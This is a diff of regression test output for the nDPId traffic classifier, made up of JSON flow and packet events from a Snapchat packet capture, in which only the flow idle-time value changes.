-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431417993318,"flow_last_seen":1431417993318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431417993318,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS 
(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01113{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008133,"flow_last_seen":1431418008133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008133,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431418008133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008133,"pkt":"ABoRAAACABoRAAABCABFAAA8wNFAAEAGnNcKCAABSn2IjduBAbsrgq06AAAAAKAC\/\/9G3wAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431417993318,"flow_last_seen":1431417993318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431417993318,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01113{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008133,"flow_last_seen":1431418008133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008133,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431418008133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008133,"pkt":"ABoRAAACABoRAAABCABFAAA8wNFAAEAGnNcKCAABSn2IjduBAbsrgq06AAAAAKAC\/\/9G3wAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} 
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 